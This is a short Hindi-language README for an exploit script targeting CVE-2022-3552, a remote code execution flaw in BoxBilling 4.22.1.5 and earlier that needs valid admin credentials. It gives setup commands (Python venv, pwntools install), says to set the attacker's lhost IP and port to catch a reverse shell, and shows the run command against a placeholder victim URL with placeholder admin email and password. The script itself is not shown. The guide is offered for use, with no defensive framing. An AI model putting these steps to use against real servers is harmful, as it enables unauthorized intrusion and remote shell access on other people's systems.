
CVE-2022-3552 RCE विस्तृत शोषण चरणों के साथ
बॉक्सबिलिंग में कमजोरी का फायदा उठाने के लिए, संस्करण "BoxBilling<=4.22.1.5" होना चाहिए और आपके पास वैध व्यवस्थापक प्रमाण-पत्र होने चाहिए।
यदि आपके पास उपरोक्त स्थिति है, तो RCE प्राप्त करने के लिए आपको निम्नलिखित कदम उठाने होंगे:
Python वर्चुअल वातावरण बनाएँ (Linux)
python3 -m venv .venv
source .venv/bin/activate
अब यह pwntools लाइब्रेरी स्थापित करें
pip3 install pwntools
यदि यह लापता निर्भरताओं के बारे में शिकायत करता है, तो आपको कुछ सिस्टम पैकेज स्थापित करने की आवश्यकता हो सकती है:
sudo apt update
sudo apt install python3-pwntools
कोड में कुछ पंक्तियाँ हैं जिनमें समायोजन की आवश्यकता है, वे वे पंक्तियाँ हैं जो lhost IP और वह पोर्ट निर्धारित करती हैं जिससे आप शेल पकड़ने की योजना बना रहे हैं।
यदि आपने यह सब सही ढंग से किया है, तो अब आप शोषण चला सकते हैं और एक शेल प्राप्त कर सकते हैं! (-d = लक्ष्य, -u = एक वैध व्यवस्थापक ईमेल, -p = वैध व्यवस्थापक का पासवर्ड)
python3 CVE-2022-3552.py -d http://victimtarget.com -u [email protected] -p enterpassword1HERE